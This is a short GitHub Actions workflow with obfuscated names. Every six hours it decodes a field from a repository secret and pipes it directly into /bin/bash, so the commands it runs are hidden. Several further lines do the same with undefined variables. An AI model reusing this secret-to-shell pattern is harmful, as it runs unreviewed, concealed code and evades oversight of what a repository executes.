name: chaiyouge1940

on:
  workflow_dispatch:
  schedule:
    - cron: '7 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chaiyouge1940
        env:
          risd1: ${{ secrets.risd1 }}
        run: |
          echo $risd1 | jq -r .q357 | /bin/bash
          echo $pxw27190 | jq -r .dvhsd678 | /bin/bash
          echo $fxac04 | jq -r .jkxzf24 | /bin/bash
          echo $ownin27 | jq -r .rcca1177 | /bin/bash
          echo $mgkx61119 | jq -r .r88903 | /bin/bash
          echo $ehjo82394 | jq -r .wup78 | /bin/bash
          echo $xmj66280 | jq -r .l213 | /bin/bash
          echo $bwd33577 | jq -r .z353 | /bin/bash

